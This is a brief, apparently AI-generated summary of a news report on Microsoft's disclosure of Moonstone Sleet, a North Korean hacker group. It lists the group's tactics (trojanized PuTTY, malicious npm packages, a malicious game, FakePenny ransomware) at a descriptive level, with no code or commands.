Microsoft Uncovers ‘Moonstone Sleet’ — New North Korean Hacker Group

Microsoft Uncovers 'Moonstone Sleet' — New North Korean Hacker Group

May 29, 2024 at 07:00AM

A new North Korean threat actor, Moonstone Sleet, is attributed to cyber attacks targeting various sectors with ransomware and bespoke malware previously associated with the infamous Lazarus Group. Moonstone Sleet uses a combination of old and unique techniques to achieve its objectives, posing a significant threat. The disclosure warns of supply chain attacks and urges vigilance.

After analyzing the meeting notes, the key takeaways are:

1. A new North Korean threat actor called Moonstone Sleet has been identified as behind cyber attacks targeting various sectors including software and information technology, education, and defense industrial base with ransomware and bespoke malware.

2. Moonstone Sleet is observed to employ various tactics such as setting up fake companies and job opportunities, distributing trojanized versions of legitimate tools, creating malicious games, and delivering custom ransomware.

3. The threat actor has exhibited similarities with the Lazarus Group and has been tracked by Microsoft under the names Storm-1789 and Storm-1877, adopting both tried-and-true techniques used by other North Korean threat actors and unique attack methodologies.

4. Various attack chains and sequences have been observed, including the use of modified versions of PuTTY, malicious npm packages, and a malicious tank game called DeTankWar for malware delivery.

5. Moonstone Sleet has used multiple approaches to engage targets, including messaging platforms, emails, and social engineering campaigns using fake companies and websites.

6. The threat actor has also been linked to the deployment of a custom ransomware variant called FakePenny against a defense technology company in exchange for a $6.6 million ransom in Bitcoin.

7. Redmond is urging software companies to be vigilant for supply chain attacks, given North Korean threat actors’ propensity for poisoning the software supply chain to conduct widespread malicious operations.

These takeaways provide a clear overview of the activities and tactics employed by the Moonstone Sleet threat actor, as well as the response and security measures recommended by Microsoft. Let me know if there is anything specific you would like to focus on or any additional details required.

Full Article